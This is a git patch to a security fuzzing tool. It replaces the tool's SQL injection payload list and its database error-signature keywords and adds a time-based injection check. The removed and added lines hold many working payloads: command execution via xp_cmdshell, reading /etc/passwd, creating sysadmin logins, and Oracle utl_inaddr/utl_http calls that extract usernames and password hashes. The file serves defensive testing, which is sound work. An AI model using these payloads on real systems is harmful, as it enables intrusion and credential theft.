From 5b00943aecd0e8bbfe38a40041fa6c849301a958 Mon Sep 17 00:00:00 2001 From: "michael.dong@rackspace.com" Date: Mon, 16 May 2016 14:27:02 -0500 Subject: [PATCH] Improved SQL tests SQL injection payloads and error strings are now similar to that of SQLmap Change-Id: I13c041ed25be7c130e20306e828c7bd149df4da2 Implements: blueprint/test-fuzz-sql-improve --- data/sql-injection.txt | 353 +++--------------------------------- syntribos/tests/fuzz/sql.py | 52 +++--- 2 files changed, 59 insertions(+), 346 deletions(-) diff --git a/data/sql-injection.txt b/data/sql-injection.txt index 3de5ba47..32e3e15f 100644 --- a/data/sql-injection.txt +++ b/data/sql-injection.txt @@ -1,327 +1,30 @@ -'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- -'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- -'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- -'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- -'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- -'; exec master..xp_cmdshell 'ping 10.10.1.2'-- -'create user name identified by 'pass123' -- -'create user name identified by pass123 temporary tablespace temp default tablespace users; -' ; drop table temp -- -'exec sp_addlogin 'name' , 'password' -- -' exec sp_addsrvrolemember 'name' , 'sysadmin' -- -' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- -' grant connect to name; grant resource to name; -- -' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) +AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) +AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')) +AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2) +AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x) +AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC) +PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1) +(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) +(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))) +(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)) +,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) +,ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x) +,(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)) +AND (SELECT * FROM (SELECT(SLEEP(10)))x) +AND SLEEP(10) +RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x) +AND ELT(1=1,SLEEP(10)) +AND 1=(SELECT 1 FROM PG_SLEEP(10)) +(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) +(SELECT * FROM (SELECT(SLEEP(10)))x) +(SELECT 1 FROM PG_SLEEP(10)) +,(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) +,(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) +a'b"c'd" +' or 'a'='a +" or "a"="a +') or ('a'='a +'/**/OR/**/1/**/=/**/1 ' or 1=1 -- ' union (select @@version) -- -' union (select NULL, (select @@version)) -- -' union (select NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- -<>"'%;)(&+ -| -! -? -/ -// -//* -' -' -- -( -) -*| -*/* -& -0 -031003000270000 -0 or 1=1 -0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) -0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A -0x77616974666F722064656C61792027303A303A31302700 exec(@s) -1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; -1 or 1=1 -1;SELECT%20* -1 waitfor delay '0:0:10'-- -'%20or%20''=' -'%20or%201=1 -')%20or%20('x'='x -'%20or%20'x'='x -%20or%20x=x -%20'sleep%2050' -%20$(sleep%2050) -%21 -23 OR 1=1 -%26 -%27%20or%201=1 -%28 -%29 -%2A%28%7C%28mail%3D%2A%29%29 -%2A%28%7C%28objectclass%3D%2A%29%29 -%2A%7C -||6 -'||'6 -(||6) -%7C -a' -admin' or ' -' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); -' and 1 in (select var from temp)-- -anything' OR 'x'='x -"a"" or 1=1--" -a' or 1=1-- -"a"" or 3=3--" -a' or 3=3-- -a' or 'a' = 'a -'%20OR -as -asc -a' waitfor delay '0:0:10'-- -'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > -bfilename -char%4039%41%2b%40SELECT -declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) -declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) -declare @q nvarchar (4000) select @q = -declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) -declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) -declare @s varchar(22) select @s = -declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e -delete -desc -distinct -'||(elt(-3+5,bin(15),ord(10),hex(char(45)))) -'; exec master..xp_cmdshell -'; exec master..xp_cmdshell 'ping 172.10.1.255'-- -exec(@s) -'; exec ('sel' + 'ect us' + 'er') -exec sp -'; execute immediate 'sel' || 'ect us' || 'er' -exec xp -'; exec xp_regread -' group by userid having 1=1-- -handler -having -' having 1=1-- -hi or 1=1 --" -hi' or 1=1 -- -"hi"") or (""a""=""a" -hi or a=a -hi' or 'a'='a -hi') or ('a'='a -'hi' or 'x'='x'; -insert -like -limit -*(|(mail=*)) -*(|(objectclass=*)) -or -' or ''=' - or 0=0 #" -' or 0=0 -- -' or 0=0 # -" or 0=0 -- -or 0=0 -- -or 0=0 # -' or 1 --' -' or 1/* -; or '1'='1' -' or '1'='1 -' or '1'='1'-- -' or 1=1 -' or 1=1 /* -' or 1=1-- -' or 1=1-- -'/**/or/**/1/**/=/**/1 -‘ or 1=1 -- -" or 1=1-- -or 1=1 -or 1=1-- - or 1=1 or ""= -' or 1=1 or ''=' -' or 1 in (select @@version)-- -or%201=1 -or%201=1 -- -' or 2 > 1 -' or 2 between 1 and 3 -' or 3=3 -‘ or 3=3 -- -' or '7659'='7659 - or a=a - or a = a -' or 'a'='a -' or a=a-- -') or ('a'='a -" or "a"="a -) or (a=a -order by -' or (EXISTS) - or isNULL(1/0) /* -" or isNULL(1/0) /* -' or 'something' like 'some%' -' or 'something' = 'some'+'thing' -' or 'text' = n'text' -' or 'text' > 't' -' or uid like '% -' or uname like '% -' or 'unusual' = 'unusual' -' or userid like '% -' or user like '% -' or username like '% -' or username like char(37); -' or 'whatever' in ('whatever') -' -- &password= -password:*/=1-- -PRINT -PRINT @@variable -procedure -replace -select -' select * from information_schema.tables-- -' select name from syscolumns where id = (select id from sysobjects where name = tablename')-- -' (select top 1 ---sp_password -'sqlattempt1 -(sqlattempt2) -'sqlvuln -'+sqlvuln -(sqlvuln) -sqlvuln; -t'exec master..xp_cmdshell 'nslookup www.google.com'-- -to_timestamp_tz -truncate -tz_offset -' UNION ALL SELECT -' union all select @@version-- -' union select -uni/**/on sel/**/ect -' UNION SELECT -' union select 1,load_file('/etc/passwd'),1,1,1; -) union select * from information_schema.tables; -' union select * from users where login = char(114,111,111,116); -update -'||UTL_HTTP.REQUEST -,@variable -@variable -@var select @var as var into temp end -- -\x27UNION SELECT -x' AND 1=(SELECT COUNT(*) FROM tabname); -- -x' AND email IS NULL; -- -x' AND members.email IS NULL; -- -x' AND userid IS NULL; -- -x' or 1=1 or 'x'='y -x' OR full_name LIKE '%Bob% -ý or 1=1 -- -sleep(__TIME__)# -1 or sleep(__TIME__)# -" or sleep(__TIME__)# -' or sleep(__TIME__)# -" or sleep(__TIME__)=" -' or sleep(__TIME__)=' -1) or sleep(__TIME__)# -") or sleep(__TIME__)=" -') or sleep(__TIME__)=' -1)) or sleep(__TIME__)# -")) or sleep(__TIME__)=" -')) or sleep(__TIME__)=' -;waitfor delay '0:0:__TIME__'-- -);waitfor delay '0:0:__TIME__'-- -';waitfor delay '0:0:__TIME__'-- -";waitfor delay '0:0:__TIME__'-- -');waitfor delay '0:0:__TIME__'-- -");waitfor delay '0:0:__TIME__'-- -));waitfor delay '0:0:__TIME__'-- -'));waitfor delay '0:0:__TIME__'-- -"));waitfor delay '0:0:__TIME__'-- -benchmark(10000000,MD5(1))# -1 or benchmark(10000000,MD5(1))# -" or benchmark(10000000,MD5(1))# -' or benchmark(10000000,MD5(1))# -1) or benchmark(10000000,MD5(1))# -") or benchmark(10000000,MD5(1))# -') or benchmark(10000000,MD5(1))# -1)) or benchmark(10000000,MD5(1))# -")) or benchmark(10000000,MD5(1))# -')) or benchmark(10000000,MD5(1))# -pg_sleep(__TIME__)-- -1 or pg_sleep(__TIME__)-- -" or pg_sleep(__TIME__)-- -' or pg_sleep(__TIME__)-- -1) or pg_sleep(__TIME__)-- -") or pg_sleep(__TIME__)-- -') or pg_sleep(__TIME__)-- -1)) or pg_sleep(__TIME__)-- -")) or pg_sleep(__TIME__)-- -')) or pg_sleep(__TIME__)-- -1'1 -1 exec sp_ (or exec xp_) -1 and 1=1 -1' and 1=(select count(*) from tablenames); -- -1 or 1=1 -1' or '1'='1 -1 -1 and user_name() = 'dbo' -\'; desc users; -- -1\'1 -1' and non_existant_table = '1 -' or username is not NULL or username = ' -1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 -1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- -1 uni/**/on select all from where -’ or ‘1’=’1 -' or '1'='1 -'||utl_http.request('httP://192.168.1.1/')||' -' || myappadmin.adduser('admin', 'newpass') || ' -' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i +; OR '1'='1' \ No newline at end of file diff --git a/syntribos/tests/fuzz/sql.py b/syntribos/tests/fuzz/sql.py index d057ae1c..18aedfab 100644 --- a/syntribos/tests/fuzz/sql.py +++ b/syntribos/tests/fuzz/sql.py @@ -20,27 +20,23 @@ class SQLInjectionBody(base_fuzz.BaseFuzzTestCase): test_type = "data" data_key = "sql-injection.txt" failure_keys = [ - 'fatal', - 'warning', - 'error', - 'exception', - 'illegal', - 'invalid', - 'fail', - 'stack', - 'access', - 'directory', - 'file', - 'not found', - 'unknown', - 'uid=', - 'varchar', - 'ODBC', - 'SQL', - 'quotation mark', - 'syntax', - 'ORA-', - '111111' + "SQL syntax", + "mysql", + "MySqlException (0x", + "valid MySQL result", + "check the manual that corresponds to your MySQL server version", + "MySqlClient.", + "com.mysql.jdbc.exceptions", + "SQLite/JDBCDriver", + "SQLite.Exception", + "System.Data.SQLite.SQLiteException", + "sqlite_.", + "SQLite3::", + "[SQLITE_ERROR]", + "Unknown column", + "where clause", + "SqlServer", + "syntax error" ] def test_case(self): @@ -60,6 +56,20 @@ class SQLInjectionBody(base_fuzz.BaseFuzzTestCase): ) ) + time_diff = self.config.time_difference_percent / 100 + if (self.resp.elapsed.total_seconds() > + time_diff * self.init_response.elapsed.total_seconds()): + self.register_issue( + Issue(test="sql_timing", + severity="Medium", + confidence="Medium", + text=( + "A response to one of our payload requests has " + "taken too long compared to the baseline request. " + "This could indicate a vulnerability to time-based " + "SQL injection attacks")) + ) + class SQLInjectionParams(SQLInjectionBody): test_name = "SQL_INJECTION_PARAMS"